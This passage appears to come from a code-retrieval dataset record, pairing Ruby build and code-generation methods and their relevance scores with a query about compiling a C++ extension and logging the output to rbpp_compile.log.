"def generate\n puts \"current path should be: \" + PATH_SCRIPT + \"/core\"\n result = false\n Dir.chdir(PATH_SCRIPT+\"/core\") do\n result = call_system_command(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n Dir.chdir(PATH_SCRIPT+\"/is\") do\n result = system(CMD_BUILD_GENERATE)\n puts \"generating source code failed, and return #{result}.\" unless result\n end\n return result\n end",
"def genFileContent(cls, bld)\n\n # Add in any dependencies required by functions\n for fun in cls.functions\n if fun.elementId == CodeElem::ELEM_FUNCTION\n if fun.isTemplate\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\n if templ != nil\n templ.process_dependencies(cls, bld, fun)\n else\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\n end\n end\n end\n end\n\n Utils.instance.genUses(cls.uses, bld)\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.startBlock(\"namespace \" << cls.namespace.get(\".\"))\n end\n\n classDec = cls.model.visibility + \" interface \" + Utils.instance.getStyledClassName(cls.name)\n\n for par in (0..cls.baseClassModelManager.size)\n if par == 0 && cls.baseClasses[par] != nil\n classDec << \" : \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n elsif cls.baseClasses[par] != nil\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\n end\n end\n\n bld.startClass(classDec)\n\n bld.endClass\n\n # Process namespace items\n if cls.namespace.hasItems?()\n bld.endBlock(\" // namespace \" + cls.namespace.get(\".\"))\n bld.add\n end\n end",
"def generate(scripts)\n require 'uncool/app'\n\n app = App.new(options)\n\n output = app.generate(scripts)\n\n $stdout.puts(output)\n end",
"def write_java\n puts \"Creating java file\"\n j = \"\n package #{ @pkg };\n\n import android.app.Activity;\n import android.os.Bundle;\n import com.phonegap.*;\n\n public class #{ @name.gsub(' ','') } extends DroidGap\n {\n @Override\n public void onCreate(Bundle savedInstanceState)\n {\n super.onCreate(savedInstanceState);\n super.loadUrl(\\\"file:///android_asset/www/index.html\\\");\n }\n }\n \"\n code_dir = File.join(@output_dir, \"src\", @pkg.gsub('.', File::SEPARATOR))\n FileUtils.mkdir_p(code_dir)\n open(File.join(code_dir, \"#{ @name.gsub(' ','') }.java\"),'w') { |f| f.puts j.gsub(' ','') }\n end",
"def write_project_packages\n puts \"Processing project\"\n\n def package_name_from_file(file)\n dirs = File.dirname(file).split(\"/\").reverse\n i = dirs.index(\"src\") || dirs.index(\"tests\") || dirs.index(\"model-src\")\n i && dirs[0..i-1].reverse.join(\".\")\n end\n\n project_classes = []\n Find.find(Dir.pwd) do |file|\n if File.expand_path(file) == File.expand_path(\"project\")\n Find.prune\n elsif file =~ /.*\\.scala$/ then\n IO.readlines(file).each do |line|\n if line =~ /\\s*(class|trait|object)\\s*(\\w+)\\s*(private)?\\s*(((extends)|(with))\\s+\\w+\\s*)*(\\{|\\[|\\(|$)/ then\n if package_name_from_file(file) then \n project_classes << [$2, package_name_from_file(file)]\n end\n end\n end\n end\n end\n\n File.open($project_packages_file, \"w\") do |f|\n project_classes.uniq.each do |x|\n klass, pckg = x\n f.puts(\"#{klass}\\t#{pckg}\")\n end\n end\nend",
"def build(ostream = nil)\n if File.exists? root(:output)\n raise Errno::EEXISTS unless File.directory? root(:output)\n else\n Dir.mkdir root(:output)\n end\n\n begin\n all.each do |page|\n ostream << \" * #{page.output_path}\\n\" if ostream\n\n begin\n rendered = page.render\n force_file_open(page.output_path) { |file| file << rendered }\n\n rescue RenderError => e\n ostream << \" *** Error: #{e.to_s}\".gsub(\"\\n\", \"\\n *** \") << \"\\n\"\n end\n end\n\n rescue NoGemError => e\n ostream << \" *** Error: #{e.message}\\n\"\n end\n end",
"def save\n require 'yaml'\n File.open(output_file, 'w') { |f| f.puts(generate.to_yaml) }\n end",
"def dump(production = false)\n FileUtils.mkdir(@output_folder)\n puts \"\\nFrank is...\"\n puts \" - \\033[32mCreating\\033[0m '#{@output_folder}'\"\n \n compile_templates(production)\n copy_static\n puts \"\\n \\033[32mCongratulations, project dumped to '#{@output_folder}' successfully!\\033[0m\"\n end",
"def generate_help_project\n # Set which files should actually be generated\n @generated_files = @files.select { |f| f.text? }\n\n debug_msg \"Generating the help project files\"\n generate_file_index\n generate_class_index\n generate_project_file\n generate_contents\n generate_chm_index\n compile_project\n end",
"def generate_index_files\n @folders.each do |folder, files|\n puts \" + Creating #{@dest}/#{folder}/index.html\" if @verbose\n File.open(\"#{@dest}/#{folder}/index.html\", \"w\") do |index|\n title = \"Rails Plug-in for #@name #@version\"\n index.write(\"<html><head><title>#{title}</title></head>\\n\")\n index.write(\"<body>\\n\")\n index.write(\"<h2>#{title}</h2>\\n\")\n extra_links = create_extra_links()\n index.write(\"<p>#{extra_links}</p>\\n\") if extra_links \n files.each { |fn|\n puts(\" - Adding #{fn}\") if @verbose\n index.write(\" <a href=\\\"#{fn}\\\">#{fn}</a><br/>\\n\")\n }\n index.write(\"<hr size=\\\"1\\\"/><p style=\\\"font-size: x-small\\\">Generated with RailsPluginPackageTask<p>\")\n index.write(\"</body>\\n\")\n index.write(\"</html>\\n\")\n end\n end\n end",
"def generate_index_files\n @folders.each do |folder, files|\n puts \" + Creating #{@dest}/#{folder}/index.html\" if @verbose\n File.open(\"#{@dest}/#{folder}/index.html\", \"w\") do |index|\n title = \"Rails Plug-in for #@name #@version\"\n index.write(\"<html><head><title>#{title}</title></head>\\n\")\n index.write(\"<body>\\n\")\n index.write(\"<h2>#{title}</h2>\\n\")\n extra_links = create_extra_links()\n index.write(\"<p>#{extra_links}</p>\\n\") if extra_links\n files.each { |fn|\n puts(\" - Adding #{fn}\") if @verbose\n index.write(\" <a href=\\\"#{fn}\\\">#{fn}</a><br/>\\n\")\n }\n index.write(\"<hr size=\\\"1\\\"/><p style=\\\"font-size: x-small\\\">Generated with RailsPluginPackageTask<p>\")\n index.write(\"</body>\\n\")\n index.write(\"</html>\\n\")\n end\n end\n end",
"def write(new_files)\n case settings[:style]\n when :classic\n # Single file\n printf \"Writing classic app to: %s\\n\", settings[:output_file]\n File.open(settings[:output_file], 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n new_files.each do |file|\n f << \"\\n# #{file.first.sub(/\\.rb$/,'').humanize}\\n\"\n f << file.last\n end\n end\n when :modular\n # Separate files\n new_files.each do |file|\n filename = \"#{settings[:output_dir]}/#{file.first}\"\n printf \" write %-40s\\n\", filename\n File.open(filename, 'w') do |f|\n #f << \"##\\n\"\n #f << \"# Generated by \\\"rake #{ARGV * ' '}\\\"\\n\"\n #f << \"# Keep up to date: #{PLUGIN_URL}\\n\"\n #f << \"#\\n\"\n f << \"class #{settings[:class_name]}\\n\"\n f << file.last\n f << \"end\\n\" \n end\n end\n else\n raise \"Invalid style for Sinatra::FromRails: #{settings[:style]} (must be :classic or :modular)\"\n end\n end",
"def gen_sub_directories\n @outputdir.mkpath\n end",
"def generate\n generate_header\n generate_content\n #not_dirty\n end",
"def genFileContent(cls, bld)\r\n\r\n # Add in any dependencies required by functions\r\n for fun in cls.functions\r\n if fun.elementId == CodeElem::ELEM_FUNCTION\r\n if fun.isTemplate\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\r\n if templ != nil\r\n templ.process_dependencies(cls, bld, fun)\r\n else\r\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\r\n end\r\n end\r\n end\r\n end\r\n\r\n cls.addUse(\"System.Data.SqlClient\")\r\n\r\n Utils.instance.genUses(cls.uses, bld)\r\n Utils.instance.genNamespaceStart(cls.namespace, bld)\r\n\r\n classDec = cls.model.visibility + \" class \" + getClassName(cls) + \"Controller\"\r\n\r\n classDec << \" : ApiController\"\r\n\r\n for par in (0..cls.baseClassModelManager.size)\r\n if cls.baseClasses[par] != nil\r\n classDec << \", \" << cls.baseClasses[par].visibility << \" \" << cls.baseClasses[par].name\r\n end\r\n end\r\n\r\n bld.startClass(classDec)\r\n\r\n if (cls.functions.length > 0)\r\n bld.add\r\n end\r\n\r\n # Generate code for functions\r\n for fun in cls.functions\r\n if fun.elementId == CodeElem::ELEM_FUNCTION\r\n if fun.isTemplate\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", fun.name)\r\n if templ != nil\r\n templ.get_definition(cls, bld, fun)\r\n else\r\n puts \"ERROR no plugin for function: \" + fun.name + \" language: csharp\"\r\n end\r\n else # Must be empty function\r\n templ = XCTEPlugin::findMethodPlugin(\"csharp\", \"method_empty\")\r\n if templ != nil\r\n templ.get_definition(cls, bld)\r\n else\r\n #puts 'ERROR no plugin for function: ' + fun.name + ' language: csharp'\r\n end\r\n end\r\n end\r\n end # class + cls.getUName()\r\n bld.endClass\r\n\r\n Utils.instance.genNamespaceEnd(cls.namespace, bld)\r\n end",
"def finish\n if @write_options then\n write_options\n exit\n end\n\n @op_dir ||= 'doc'\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n root = @root.to_s\n @rdoc_include << root unless @rdoc_include.include?(root)\n\n @exclude = self.exclude\n\n finish_page_dir\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n unless @template then\n @template = @generator_name\n @template_dir = template_dir_for @template\n end\n\n if @locale_name\n @locale = RDoc::I18n::Locale[@locale_name]\n @locale.load(@locale_dir)\n else\n @locale = nil\n end\n\n self\n end",
"def compile\n tmpdir = Dir.mktmpdir\n Dir.chdir(tmpdir) do |source_dir, build_dir|\n yield source_dir, @build_dir\n end\n\n puts \"Packaging the following files/dirs:\"\n pipe \"ls #{@build_dir}\"\n ensure\n if ENV['DEBUG']\n puts \"Source dir: #{tmpdir}\"\n else\n FileUtils.rm_rf(tmpdir)\n end\n end",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def generate\n classes = registry.all(:class)\n classes.each do |c|\n data = methods(c)\n output(data, c.to_s)\n end\n end",
"def generate_files\n copy_file 'queued_task.rb', \"app/models/#{name}.rb\"\n end",
"def gen\n with_output_to @fn do\n pp \"require 'spqr/spqr'\"\n pp \"require 'spqr/app'\"\n\n pp \"\"\n\n @scs.each do |sc|\n pp(\"require '#{sc.package.gsub(/[.]/, '/')}/#{sc.name}'\")\n end\n\n \n pp \"\"\n \n pp \"app = SPQR::App.new(:loglevel => :debug)\"\n \n klass_list = @scs.collect do |sc|\n (sc.package.split(\".\").collect{|pkg| pkg.capitalize} << sc.name).join(\"::\")\n end\n \n pp \"app.register #{klass_list.join ','}\"\n \n pp \"\"\n\n pp \"app.main\"\n end\n end",
"def generate_files\n ip = local_ip\n version = Farmstead::VERSION\n scaffold_path = \"#{File.dirname __FILE__}/scaffold\"\n scaffold = Dir.glob(\"#{scaffold_path}/**/*.erb\", File::FNM_DOTMATCH)\n scaffold.each do |file|\n basename = File.basename(file)\n folderstruct = file.match(\"#{scaffold_path}/(.*)\")[1]\n if basename != folderstruct\n foldername = File.dirname(folderstruct)\n create_recursive(\"#{@name}/#{foldername}\")\n end\n projectpath = \"#{@name}/#{folderstruct}\".chomp(\".erb\")\n template = File.read(file)\n results = ERB.new(template).result(binding)\n copy_to_directory(results, projectpath)\n end\n end",
"def create_source_files\n empty_directory(File.join(target_dir, \"lib/kitchen/driver\"))\n\n create_template(\n \"version.rb.erb\",\n \"lib/kitchen/driver/#{name}_version.rb\"\n )\n create_template(\n \"driver.rb.erb\",\n \"lib/kitchen/driver/#{name}.rb\"\n )\n end",
"def generate(destination)\n destination = Pathname(destination).expand_path\n # First, we find all of the renderable files in the project and iterate over that list.\n #\n # Next, we create a [Page](./soundwave/page.html) object for each file and write it to\n # the destination path.\n find_paths.each do |path|\n page = Page.new(self, path)\n page.write(destination.join(page.output_path))\n end\n end",
"def generate\n po = extract_messages\n pot_path = 'rdoc.pot'\n File.open(pot_path, \"w\") do |pot|\n pot.print(po.to_s)\n end\n end",
"def build\n system(\"make build\", :chdir => self.config['destination'], :out => :err)\n end",
"def build\n entries = Dir.entries(@input_dir)\n entries.delete_if {|e| @exclude.include?(e)}\n FileUtils.rm_f(@output_file) # Make sure file doesn't exist\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |zipfile|\n write_entries entries, '', zipfile\n end\n end",
"def maybe_generate\n return if @generated\n puts \"\\nGenerating byte_code image\" if Rake.verbose\n # image=[] # TBR?\n @memloc=0\n def_list=@dictionary.values.map{|v| v.definitions}.flatten.reject{|d| d.primitive?}\n def_list.each do |d|\n begin\n code=[]\n cdef=MFCompiledDefinition.new\n cdef.location=@memloc\n cdef.definition=d\n cdef.flags=(cdef.definition.definer == \"SYNTAX:\" ? 1 : 0)\n @compiled_definitions << cdef # adding here already although body may be empty\n # determine code size beforehand to get offset for data segment of definition\n defsize=d.code.body.map{|w| element_size(w)}.reduce(:+) +1 # final qend\n @data=[]\n @data_counter=@memloc+defsize # initialize data segment counter\n puts \"compiling definition for #{d.name}\" if Rake.verbose == true\n d.code.body.each do |word|\n word_bytecode(word,code)\n end\n code << prim(:qend)\n puts \"#{d.name} is at #{@memloc}\" if Rake.verbose == true\n @memloc += (defsize + @data.length)\n cdef.code=code+@data\n rescue\n puts \"failed to compile definition:\"\n puts \"ERROR:#{d.err_loc}: #{d.see}\"\n raise\n end\n end\n @size=@memloc\n puts \"total bytecode size: #{@memloc}\" if Rake.verbose\n puts \"memory map:\" if Rake.verbose == true\n @compiled_definitions.each do |d|\n puts \"@#{d.location}: #{d.definition.name} #{d.definition.primitive? ? 'prim' : '' }\"\n print d.code\n puts \";\" if d.code\n end if Rake.verbose == true\n print ISET.keys.map{ |name| [name,prim(name)] },\"\\n\" if Rake.verbose == true\n # need to actually generate the dictionary here, and do a second pass substituting all wrapped words\n calculate_dict_entries\n # replace all placeholders with dictionary offsets\n @compiled_definitions.each do |cdef|\n cdef.code.each_with_index do |w,i|\n case w\n when Array\n if w[0] == :dict_address\n puts \"replacing placeholder in '#{cdef.definition.name}'\" if Rake.verbose == true\n addr = @dict_positions[w[1]]\n raise \"cannot get address of word '#{w[1]}'\" unless addr\n cdef.code[i,cell_width]=int_bytes(addr,cell_width)\n elsif w[0] == :deferred\n # CAVEAT: this here works by looking up the definition by name! for\n # non-unique naming case, there must be a different way to get from the deferred definition to the actual definition\n puts \"replacing deffered definition in '#{cdef.definition.name}'\" if Rake.verbose == true\n actual_def = (@compiled_definitions.find{|cdef|\n # puts \"checking #{cdef.definition.name}(#{cdef.definition.object_id}) against #{w[1].name}(#{w[1].object_id})\"\n cdef.definition.name==w[1].name})\n raise \"no actual definition found for deferred definition\" unless actual_def\n cdef.code[i,2]=int_bytes(actual_def.location,2)\n else\n raise \"dunno what to do with #{w}\"\n end\n end\n end\n end\n check_locations\n @generated = true\n # @compiled_definitions.map{|d| d.code}.flatten\n end",
"def output_path\n \"build\"\n end",
"def create_output_files\n return unless @option_output_path\n return if @collected_nodes.empty?\n @collected_nodes.each do |certname, properties|\n next if properties['settings'].empty?\n output_file = \"#{@option_output_path}/nodes/#{certname}.yaml\"\n File.write(output_file, properties['settings'].to_yaml)\n output(\"## Wrote Hiera YAML file: #{output_file}\\n\\n\")\n end\n return if @common_settings.empty?\n output_file = \"#{@option_output_path}/common.yaml\"\n File.write(output_file, @common_settings.to_yaml)\n end",
"def run\n puts \"\\nHere we go!\\n\\n\"\n make_output_directory\n build_jar\n create_android\n include_www\n generate_manifest\n copy_libs\n add_name_to_strings\n write_java\n puts \"\\nDone!\\n\\n\"\n `open #{@output_dir}`\n end",
"def generate(files) \n # Each object passed in is a file, process it\n @comments = []\n @containers = []\n @objects = []\n @methods = []\n files.each { |file| process_file(file) }\n (@previous_comments - @comments).each {|id| CodeComment.find(id).destroy }\n (@previous_objects - @objects).each {|id| CodeObject.find(id).destroy }\n (@previous_methods - @methods).each {|id| CodeMethod.find(id).destroy }\n (@previous_containers - @containers).each {|id| CodeContainer.find(id).destroy }\n end",
"def export!\n verify_overwriting if File.exist?(Frank.export.path)\n FileUtils.mkdir(Frank.export.path)\n\n unless Frank.silent_export?\n puts \"\\nFrank is...\"\n puts \" - \\033[32mCreating\\033[0m '#{Frank.export.path}'\"\n end\n\n compile_templates\n copy_static\n if Frank.compress?\n begin\n require 'yui/compressor'\n rescue\n puts \"You need to install the yui-compressor gem to enable compression\"\n end\n end\n\n if Frank.production?\n package_stylesheets\n package_javascripts\n end\n\n\n puts \"\\n \\033[32mCongratulations, project dumped to '#{Frank.export.path}' successfully!\\033[0m\" unless Frank.silent_export?\n end",
"def write_transform_file\n render_template(resource_path(\"doc-transform.erb\"),\n destination: transform_file,\n variables: {\n pathdir: project.install_dir.split(\"/\")[1],\n })\n end",
"def generate\n save\n end",
"def build()\n HP.logger.debug(\"~ Build Mode: #{build_mode}\")\n HP.logger.debug(\"~ Source Root: #{source_root}\")\n HP.logger.debug(\"~ Build Root: #{build_root}\")\n build_entries(entries())\n end",
"def generate\n @to_copy = @git.ls_files.keys - ['README', 'README.md', 'README.markdown', 'generate.rb', '.gitignore']\n\n code_path = src_path('generate.rb')\n if File.exists?(code_path)\n eval(File.read(code_path), binding, code_path)\n end\n\n interpolate(@to_copy.select {|path| path =~ /\\.erb\\z/})\n copy @to_copy\n end",
"def execute!\n make_web_directory\n generate_universe\n generate_html\n print_success_message\n end",
"def output_path; end",
"def generate(file_name,template,map, overwrite = true)\r\n # make sure the package folder exists\r\n pkg_path = (map['package'] || '').gsub('.','/') \r\n FileUtils.makedirs \"#{target}/#{pkg_path}\"\r\n File.open(\"#{target}/#{pkg_path}/#{file_name}\",'w') do |f|\r\n f << self.process_template(template,map)\r\n log \">> writing #{f.path}\"\r\n end #file\r\n end",
"def generate_bulk_export\n # Delete the bulk_export directory if it exists.\n FileUtils.rm_rf(\"bulk_export\")\n\n get_all_insurance_plans\n get_all_location_resources\n p \"===============================================================\"\n p \"Creating the Bulk export folder output ...\"\n generate_payer_bulk_data\n generate_formulary_bulk_data\nend",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def gen_sub_directories\n FileUtils.mkdir_p RDoc::Generator::FILE_DIR\n FileUtils.mkdir_p RDoc::Generator::CLASS_DIR\n rescue\n $stderr.puts $!.message\n exit 1\n end",
"def write_models_to_file\n Printer.new(models, @output_dir).tap do |p|\n p.write\n end\n end",
"def write\n ::Zip::File.open(@output_file, ::Zip::File::CREATE) do |io|\n @folders.each do |input_dir, src, dest|\n src = '' if src == '/**' # the whole src directory could be specified by /**\n path = source_dir(File.join(input_dir, src))\n write_entries(path, entries(src, input_dir), dest, io)\n end\n end\n\n @output_file\n end",
"def writeCompiledFile(tokens, classNames, outFile)\n resultList = compileClass2(tokens, classNames)\n str = resultList[0]\n classTable = resultList[1]\n methodsTableList = resultList[2]\n vmFile = File.new(outFile, \"w\")\n\n vmFile.syswrite(str)\n\n #will print the symbol tables commented out in the vm file\n str = \"\\n\\n//class symbol table\\n\" + classTable.printTable+\"\\n\\n\"\n for i in 0..methodsTableList.size-1\n str += \"//method's symbol table\\n\" + methodsTableList[i].printTable+\"\\n\\n\"\n end\n\n vmFile.syswrite(str)\nend",
"def generate()\n\t\t\t@out = []\n\t\t\t@context = []\n\n\t\t\ttrim_nil_lines\n\n\t\t\t@lines.each_with_index do |line, i|\n\t\t\t\twrite_with_context(line.line, line.context, next_context(i))\n\t\t\tend\n\t\t\twrite_with_context(nil, [], [])\n\t\t\treturn @out.join\n\t\tend",
"def generate_class_and_module_files\n template_file = @template_dir + 'class-page.html.erb'\n debug_msg \"Generating class documentation\"\n @unique_classes_and_modules.each do |klass|\n debug_msg \" %s %s\" % [klass.type, klass.full_name]\n outfile = @output_dir + klass.path\n @class = klass\n self.render_template(template_file, binding(), outfile)\n end\n end",
"def write( destination=nil )\n\t\tstart = Time.now\n\t\t\n\t\tsource = @bundle.source\n\t\t@html_path = destination || File.dirname(source)/\"#{File.basename source}_html\"\n\t\tFileUtils.rm_rf(@html_path) if File.exists?(@html_path)\n\t\tFileUtils.mkdir(@html_path)\n\t\t\n\t\tmaster_templates = DocuBot::TEMPLATE_DIR\n\t\tsource_templates = source/'_templates'\n\t\tmaster_root = master_templates/'_root'\n\t\tsource_root = source_templates/'_root'\n\t\t\n\t\t# Copy any files found in the source directory that weren't made into pages\n\t\t@bundle.extras.each do |file|\n\t\t\tFileUtils.mkdir_p( @html_path / File.dirname( file ) )\n\t\t\tFileUtils.cp( source / file, @html_path / file )\n\t\tend\n\t\t\n\t\t# Copy files from template to root of destination\n\t\t# Record these as extras so that the CHMWriter can access them\n\t\tDir.chdir @html_path do\n\t\t\texisting_files = Dir[ '*' ]\n\t\t\tFileUtils.copy( Dir[ master_templates/'_root'/'*' ], '.' )\n\t\t\tFileUtils.copy( Dir[ source_templates/'_root'/'*' ], '.' )\n\t\t\tnew_files = Dir[ '*' ] - existing_files\n\t\t\t@bundle.extras.concat( new_files )\n\t\tend\n\t\t\n\t\tDir.chdir @html_path do\n\t\t\to = Object.new\n\t\t\t\n\t\t\t# Write out every page\n\t\t\ttop = File.exists?( source_templates/'top.haml' ) ? source_templates/'top.haml' : master_templates/'top.haml'\n\t\t\ttop = Haml::Engine.new( IO.read( top, encoding:'utf-8' ), HAML_OPTIONS )\n\t\t\t@bundle.toc.descendants.each do |node|\n\t\t\t\tnext if node.anchor\n\t\t\t\t\n\t\t\t\tcontents = node.page.to_html\n\t\t\t\ttemplate = node.page.template # Call page.to_html first to ensure page.template is set\n\n\t\t\t\tcustom_js = \"#{template}.js\"\n\t\t\t\tcustom_js = nil unless File.exists?( source_root/custom_js ) || File.exists?( master_root/custom_js )\n\t\t\t\t\n\t\t\t\tcustom_css = \"#{template}.css\"\n\t\t\t\tcustom_css = nil unless File.exists?( source_root/custom_css ) || File.exists?( master_root/custom_css )\n\t\t\t\t\n\t\t\t\tvariables = {\n\t\t\t\t\t:page => node.page,\n\t\t\t\t\t:contents => contents,\n\t\t\t\t\t:global => @bundle.global,\n\t\t\t\t\t:root => node.page.root,\n\t\t\t\t\t:breadcrumb => node.ancestors,\n\t\t\t\t\t:custom_js => custom_js,\n\t\t\t\t\t:custom_css => custom_css\n\t\t\t\t}\t\t\t\t\n\t\t\t\thtml = top.render( o, variables )\n\t\t\t\tFileUtils.mkdir_p( File.dirname( node.file ) )\n\t\t\t\tFile.open( node.file, 'w' ){ |f| f << html }\n\t\t\tend\n\n\t\t\tFile.open( 'glossary-terms.js', 'w' ){ |f| f << @bundle.glossary.to_js }\n\t\tend\n\t\t\n\t\tputs \"...%.2fs to write the HTML\" % (Time.now - start)\n\tend",
"def write_file\n\n File.open(\"rebuild.html\", \"w\") do |file|\n @write_array.each do |tags_and_text|\n file.write tags_and_text\n end\n end\n\n end"
] |
[
"0.70972645",
"0.7075406",
"0.70609",
"0.7046495",
"0.6902335",
"0.68874085",
"0.682245",
"0.6723369",
"0.65834737",
"0.64997",
"0.64838815",
"0.64687943",
"0.6456144",
"0.64551425",
"0.6446258",
"0.641912",
"0.641912",
"0.637711",
"0.63598377",
"0.63082594",
"0.6267121",
"0.6264465",
"0.6257129",
"0.6191254",
"0.61726844",
"0.61556715",
"0.61528933",
"0.614153",
"0.6122566",
"0.6113898",
"0.6113898",
"0.6113049",
"0.61061746",
"0.6095836",
"0.6083755",
"0.6068664",
"0.6064466",
"0.6060731",
"0.60587895",
"0.6040235",
"0.6040225",
"0.60204357",
"0.601315",
"0.6009672",
"0.60074306",
"0.60054594",
"0.6000375",
"0.59987444",
"0.5984116",
"0.59728944",
"0.59627455",
"0.59369916",
"0.5926166",
"0.5921108",
"0.5916481",
"0.59036",
"0.58986557",
"0.58914924",
"0.58891445",
"0.5882883",
"0.5878153",
"0.58748853",
"0.5868538",
"0.586497",
"0.5859698",
"0.5856983",
"0.5856329",
"0.5856329",
"0.5849629",
"0.5847285",
"0.5844046",
"0.5841638",
"0.5838851",
"0.58010936",
"0.57942224",
"0.5792726",
"0.5787995",
"0.5785429",
"0.5783064",
"0.5770565",
"0.57632643",
"0.576107",
"0.5759932",
"0.5759804",
"0.57475215",
"0.57442",
"0.57342553",
"0.5720875",
"0.5716976",
"0.57138",
"0.5713684",
"0.57029676",
"0.57029676",
"0.5694555",
"0.5679125",
"0.56707394",
"0.5663767",
"0.56621635",
"0.566138",
"0.5656596"
] |
0.6821065
|
7
|
Compile the extension. This will create an rbpp_compile.log file in +working_dir+. View this file to see the full compilation process including any compiler errors / warnings.
|
def compile
Logger.info "Compiling. See rbpp_compile.log for details."
require 'rbconfig'
ruby = File.join(RbConfig::CONFIG["bindir"], RbConfig::CONFIG["RUBY_INSTALL_NAME"])
FileUtils.cd @working_dir do
system("#{ruby} extconf.rb > rbpp_compile.log 2>&1")
system("rm -f *.so")
system("make >> rbpp_compile.log 2>&1")
end
Logger.info "Compilation complete."
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def compile\n Dir.chdir(build_path) do\n do_compile\n end\n end",
"def compile\n end",
"def build\n raise ConfigurationError.new(\"Must specify working directory\") unless @working_dir\n raise ConfigurationError.new(\"Must specify which sources to wrap\") unless @parser\n\n Logger.info \"Beginning code generation\"\n\n @builder = Builders::ExtensionNode.new(@name, @node || @parser, @modules)\n @builder.add_includes @options[:includes]\n @builder.build\n @builder.sort\n\n Logger.info \"Code generation complete\"\n end",
"def compile_exec()\n compile\n exec\n end",
"def compile(mod); end",
"def compile\n return if changed_ruby_files.empty?\n\n errors = changed_ruby_files.each_with_object([]) do |file, es|\n output = `ruby -cw \"#{file}\" 2>&1`\n next if output == \"Syntax OK\\n\"\n\n es << output\n end\n heading('Ruby Warnings', errors.join) unless errors.empty?\n end",
"def compile\n File.chmod(0o755, start_script(root))\n augment_classpath_content\n end",
"def program\n @compile\n end",
"def compile\n exe_file = File.join(@temp_dir, 'exe')\n result = TTY::Command.new(printer: :quiet).run!('gcc', '-o', exe_file, @src_file)\n [exe_file, result]\n end",
"def compile_extension(extension, platform)\n compiler_options = compiler_options()\n compiler_class = compiler_class(extension)\n\n compiler_options[:platform] = platform\n\n compiler = compiler_class.new(extension, compiler_options)\n\n compiler.compile\n end",
"def compile\n cmd = self.command\n#puts ' + ' + cmd\n log.debug \"Invoking the compiler\"\n rc = Platform.execute cmd\n log.debug \"Compilation complete; rc=#{rc.to_s}\"\n rc\n end",
"def compile!\n new_version = generate_version\n new_abs_path = abs_path(new_version)\n return @compiled_path = current_file_path if @compile_files.empty?\n\n FileUtils.mkdir_p @min_dir unless File.exist?(@min_dir)\n js? ? compile_js!(new_abs_path) : compile_css!(new_abs_path)\n\n if not_changed?(new_abs_path, current_abs_path)\n puts \"file not changed, use current file (#{current_file_path})\"\n FileUtils.rm_rf new_abs_path\n @compiled_path = current_file_path\n else\n puts \"new file version (#{file_path(new_version)}) created\"\n @compiled_path = file_path(new_version)\n end\n end",
"def compilation_without_makefile\n # Build the program\n build_msg = `#{@build_command} *.c -o #{@pgm}`\n @log_file.puts \"\\nConstruction du programme :\\n\\n#{build_msg}\"\n end",
"def build!\n create_output_directory\n spec.source_directories.each { |d| simple_compile_directory(d) }\n compile_files(spec.all_javascript_paths)\n compile_files(spec.all_stylesheet_paths)\n write_manifest\n end",
"def compile_project\n debug_msg \" compiling #{@project_name}\"\n system(HHC_PATH, @project_name)\n end",
"def compile(exp)\n alloc_vtable_offsets(exp)\n compile_main(exp)\n end",
"def full_compile(arg, file, level, type)\n errors_log = compile(arg, file, \"errors\", level, type)\n str = \"\"\n if errors_log.eql?(\"No errors\")\n warnings_log = compile(arg, file, \"warnings\", level, type)\n str = warnings_log unless warnings_log.eql?(\"No warnings\")\n else\n str = errors_log\n end\n \n str\n\n end",
"def compile(path)\n\tif isExecutable(path) and not $link\n\t\t$keep = true\n\t\treturn path\n\tend\n\t\n\tbinaryPath = File.join($testDir, File.basename($link ? $source[0] : path, File.extname(path)))\n\n\tcompilerOutput = Tempfile.new(\"compiler\")\n\n# FIXME: If $link is true, it will only check the extension of the first argument.\n\tif File.extname($link ? $source[0] : path) == \".c\"\n\t\tsystem \"gcc -O2 -o \\\"#{binaryPath}\\\" #{path} &> #{compilerOutput.path}\"\n\telsif File.extname($link ? $source[0] : path) == \".cpp\"\n\t\tsystem \"g++ -O2 -o \\\"#{binaryPath}\\\" #{path} &> #{compilerOutput.path}\"\n\telse\n\t\t$stderr.puts \"This program only works with C or C++ source code.\"\n\t\texit 1\n\tend\n\n\tcompilerMessages = compilerOutput.read\n\n\tunless compilerMessages.empty?\n\t\tunless File.exists?(binaryPath)\n\t\t\t$stderr.puts red(\"Couldn't compile #{path}.\")\n\t\tend\n\t\t$stderr.puts yellow(\"Compiler output for #{path}:\")\n\t\t$stderr.puts compilerMessages\n\tend\n\n\tcompilerOutput.close\n\tcompilerOutput.unlink\n\n\tunless File.exists?(binaryPath)\n\t\tcleanup\n\t\texit 1\n\tend\n\n\treturn binaryPath\nend",
"def compile exp\n alloc_vtable_offsets(exp)\n compile_main(exp)\n\n # after the main function, we ouput all functions and constants\n # used and defined so far.\n output_functions\n output_vtable_thunks\n output_constants\n end",
"def compiledo\n\n end",
"def compilesubroutine\n\n end",
"def compile_to_c\n \"\"\n end",
"def compile\n compile_libraries\n compile_ohai_plugins\n compile_compliance\n compile_attributes\n compile_lwrps\n compile_resource_definitions\n compile_recipes\n end",
